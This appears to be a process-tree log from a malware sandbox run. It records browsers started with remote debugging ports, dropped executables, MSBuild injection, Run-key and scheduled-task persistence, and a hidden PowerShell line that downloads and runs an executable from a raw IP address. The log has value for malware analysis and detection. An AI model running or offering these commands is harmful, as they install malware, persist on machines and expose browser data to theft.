C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3236,i,14955777914410037458,259757930393019573,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3256 /prefetch:110⤵
- Uses browser remote debugging
PID:1032
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3268,i,14955777914410037458,259757930393019573,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3296 /prefetch:110⤵
- Uses browser remote debugging
PID:6344
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4312,i,14955777914410037458,259757930393019573,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4340 /prefetch:210⤵
- Uses browser remote debugging
PID:7108
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4632,i,14955777914410037458,259757930393019573,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4700 /prefetch:110⤵
- Uses browser remote debugging
PID:6124
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5188,i,14955777914410037458,259757930393019573,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5196 /prefetch:810⤵PID:5108
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5740,i,14955777914410037458,259757930393019573,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5792 /prefetch:810⤵PID:3468
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5212,i,14955777914410037458,259757930393019573,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5232 /prefetch:810⤵PID:2368
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"9⤵
- Uses browser remote debugging
PID:5552 -
C:\Windows\Logs\taskhostw.exe"C:\Windows\Logs\taskhostw.exe"10⤵PID:3152
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe" --remote-debugging-port=9223 --profile-directory=Default10⤵
- Uses browser remote debugging
PID:2812 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe" --remote-debugging-port=9223 --profile-directory=Default --edge-skip-compat-layer-relaunch11⤵
- Uses browser remote debugging
PID:3440 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x234,0x2f0,0x7ffbb025f208,0x7ffbb025f214,0x7ffbb025f22012⤵PID:5100
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1692,i,3633474014448648404,9480721310940770545,262144 --variations-seed-version --mojo-platform-channel-handle=2216 /prefetch:312⤵PID:6012
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2292,i,3633474014448648404,9480721310940770545,262144 --variations-seed-version --mojo-platform-channel-handle=2336 /prefetch:812⤵PID:6176
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2188,i,3633474014448648404,9480721310940770545,262144 --variations-seed-version --mojo-platform-channel-handle=2184 /prefetch:212⤵PID:392
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3520,i,3633474014448648404,9480721310940770545,262144 --variations-seed-version --mojo-platform-channel-handle=3560 /prefetch:112⤵
- Uses browser remote debugging
PID:1628
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3544,i,3633474014448648404,9480721310940770545,262144 --variations-seed-version --mojo-platform-channel-handle=3624 /prefetch:112⤵
- Uses browser remote debugging
PID:6272
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4144,i,3633474014448648404,9480721310940770545,262144 --variations-seed-version --mojo-platform-channel-handle=4196 /prefetch:112⤵
- Uses browser remote debugging
PID:1032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4160,i,3633474014448648404,9480721310940770545,262144 --variations-seed-version --mojo-platform-channel-handle=4200 /prefetch:212⤵
- Uses browser remote debugging
PID:7052
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5080,i,3633474014448648404,9480721310940770545,262144 --variations-seed-version --mojo-platform-channel-handle=5092 /prefetch:812⤵PID:4216
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5252,i,3633474014448648404,9480721310940770545,262144 --variations-seed-version --mojo-platform-channel-handle=5248 /prefetch:812⤵PID:5320
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3740,i,3633474014448648404,9480721310940770545,262144 --variations-seed-version --mojo-platform-channel-handle=5528 /prefetch:812⤵PID:4968
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4336,i,3633474014448648404,9480721310940770545,262144 --variations-seed-version --mojo-platform-channel-handle=5520 /prefetch:812⤵PID:5064
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3716,i,3633474014448648404,9480721310940770545,262144 --variations-seed-version --mojo-platform-channel-handle=4332 /prefetch:812⤵PID:4416
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3716,i,3633474014448648404,9480721310940770545,262144 --variations-seed-version --mojo-platform-channel-handle=4332 /prefetch:812⤵PID:2924
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5136,i,3633474014448648404,9480721310940770545,262144 --variations-seed-version --mojo-platform-channel-handle=5072 /prefetch:812⤵PID:5236
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6552,i,3633474014448648404,9480721310940770545,262144 --variations-seed-version --mojo-platform-channel-handle=6564 /prefetch:812⤵PID:5608
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5076,i,3633474014448648404,9480721310940770545,262144 --variations-seed-version --mojo-platform-channel-handle=5220 /prefetch:812⤵PID:3168
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6812,i,3633474014448648404,9480721310940770545,262144 --variations-seed-version --mojo-platform-channel-handle=6820 /prefetch:812⤵PID:2720
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6708,i,3633474014448648404,9480721310940770545,262144 --variations-seed-version --mojo-platform-channel-handle=6844 /prefetch:812⤵PID:2912
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6516,i,3633474014448648404,9480721310940770545,262144 --variations-seed-version --mojo-platform-channel-handle=7136 /prefetch:812⤵PID:1080
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7120,i,3633474014448648404,9480721310940770545,262144 --variations-seed-version --mojo-platform-channel-handle=7156 /prefetch:812⤵PID:2616
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6556,i,3633474014448648404,9480721310940770545,262144 --variations-seed-version --mojo-platform-channel-handle=7424 /prefetch:812⤵PID:4420
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5052,i,3633474014448648404,9480721310940770545,262144 --variations-seed-version --mojo-platform-channel-handle=4184 /prefetch:812⤵PID:26588
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5064,i,3633474014448648404,9480721310940770545,262144 --variations-seed-version --mojo-platform-channel-handle=4472 /prefetch:812⤵PID:26600
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7112,i,3633474014448648404,9480721310940770545,262144 --variations-seed-version --mojo-platform-channel-handle=5928 /prefetch:812⤵PID:26608
-
-
-
-
-
C:\ProgramData\5fus2nopzu.exe"C:\ProgramData\5fus2nopzu.exe"9⤵PID:6816
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"10⤵PID:2880
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"10⤵PID:6428
-
-
-
C:\ProgramData\trieukfct0.exe"C:\ProgramData\trieukfct0.exe"9⤵PID:5388
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"10⤵PID:1948
-
-
-
C:\ProgramData\sj5pp8q9zu.exe"C:\ProgramData\sj5pp8q9zu.exe"9⤵PID:2780
-
C:\Users\Admin\AppData\Local\Temp\s1rUXivF\zQmJAbdY3SCoOzcv.exeC:\Users\Admin\AppData\Local\Temp\s1rUXivF\zQmJAbdY3SCoOzcv.exe 010⤵PID:5112
-
C:\Users\Admin\AppData\Local\Temp\s1rUXivF\KVMYl7TGLhoxhrik.exeC:\Users\Admin\AppData\Local\Temp\s1rUXivF\KVMYl7TGLhoxhrik.exe 511211⤵PID:5024
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5024 -s 95612⤵
- Program crash
PID:12580
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5112 -s 66411⤵
- Program crash
PID:19356
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\6f3e3" & exit9⤵PID:12652
-
C:\Windows\SysWOW64\timeout.exetimeout /t 1110⤵
- Delays execution with timeout.exe
PID:19220
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe"C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6652 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"8⤵PID:6748
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"8⤵PID:6760
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"8⤵PID:6768
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"8⤵
- System Location Discovery: System Language Discovery
PID:6776
-
-
-
C:\Users\Admin\AppData\Local\Temp\10041600101\please18.exe"C:\Users\Admin\AppData\Local\Temp\10041600101\please18.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5812 -
C:\Windows\SysWOW64\cmd.exe"cmd" /c ping 127.0.0.1 -n 7 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "key" /t REG_SZ /d "C:\Users\Admin\AppData\Local\key.exe"8⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:3116 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 79⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6908
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "key" /t REG_SZ /d "C:\Users\Admin\AppData\Local\key.exe"9⤵PID:4280
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c ping 127.0.0.1 -n 13 > nul && copy "C:\Users\Admin\AppData\Local\Temp\10041600101\please18.exe" "C:\Users\Admin\AppData\Local\key.exe" && ping 127.0.0.1 -n 13 > nul && "C:\Users\Admin\AppData\Local\key.exe"8⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:1876 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 139⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5192
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 139⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4436
-
-
C:\Users\Admin\AppData\Local\key.exe"C:\Users\Admin\AppData\Local\key.exe"9⤵PID:12976
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"10⤵PID:19324
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10042890101\a.exe"C:\Users\Admin\AppData\Local\Temp\10042890101\a.exe"7⤵PID:6116
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe8⤵PID:4248
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe9⤵PID:4688
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe10⤵PID:384
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe11⤵PID:4676
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe12⤵PID:6384
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe13⤵PID:184
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe14⤵PID:6204
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe15⤵PID:2840
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe16⤵PID:5288
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe17⤵PID:3148
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe18⤵PID:5196
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe19⤵PID:1444
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe20⤵PID:6912
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe21⤵PID:5204
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe22⤵PID:5536
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe23⤵PID:1368
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe24⤵PID:6304
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe25⤵PID:5664
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaupdater_service.exe"26⤵
- Modifies registry key
PID:1940
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10042950101\9eb9441ba5.exe"C:\Users\Admin\AppData\Local\Temp\10042950101\9eb9441ba5.exe"7⤵PID:6400
-
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10042950101\9eb9441ba5.exe"8⤵PID:1620
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10360180101\bot.exe"C:\Users\Admin\AppData\Local\Temp\10360180101\bot.exe"5⤵
- Executes dropped EXE
PID:2284 -
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe6⤵
- Executes dropped EXE
PID:5040 -
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaupdater_service.exe"7⤵
- Modifies registry key
PID:4928
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaupdater_service.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe\"'"7⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:6628
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10360360101\2902ecdfd4.exe"C:\Users\Admin\AppData\Local\Temp\10360360101\2902ecdfd4.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3812 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn bChIBmaLxQT /tr "mshta C:\Users\Admin\AppData\Local\Temp\Hn6XEMM1W.hta" /sc minute /mo 25 /ru "Admin" /f6⤵
- System Location Discovery: System Language Discovery
PID:2328 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn bChIBmaLxQT /tr "mshta C:\Users\Admin\AppData\Local\Temp\Hn6XEMM1W.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- Scheduled Task/Job: Scheduled Task
PID:6940
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\Hn6XEMM1W.hta6⤵
- System Location Discovery: System Language Discovery
PID:5472 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'TSFIWEMVTJOY1C1YYWBBWV8YAA2LAGGK.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;7⤵
- Command and Scripting Interpreter: PowerShell
PID:6664 -
C:\Users\Admin\AppData\Local\TempTSFIWEMVTJOY1C1YYWBBWV8YAA2LAGGK.EXE"C:\Users\Admin\AppData\Local\TempTSFIWEMVTJOY1C1YYWBBWV8YAA2LAGGK.EXE"8⤵PID:5960
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10360370121\am_no.cmd" "5⤵PID:3560
-
C:\Windows\SysWOW64\timeout.exetimeout /t 26⤵
- Delays execution with timeout.exe
PID:6560
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"6⤵PID:6672
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"7⤵
- Command and Scripting Interpreter: PowerShell
PID:6752
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"6⤵PID:1492
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"7⤵
- Command and Scripting Interpreter: PowerShell
PID:976
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"6⤵PID:3052
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"7⤵
- Command and Scripting Interpreter: PowerShell
PID:6476
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "ox60lmat8P3" /tr "mshta \"C:\Temp\NpE8y1RgF.hta\"" /sc minute /mo 25 /ru "Admin" /f6⤵
- Scheduled Task/Job: Scheduled Task
PID:6312
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\NpE8y1RgF.hta"6⤵PID:6208
-
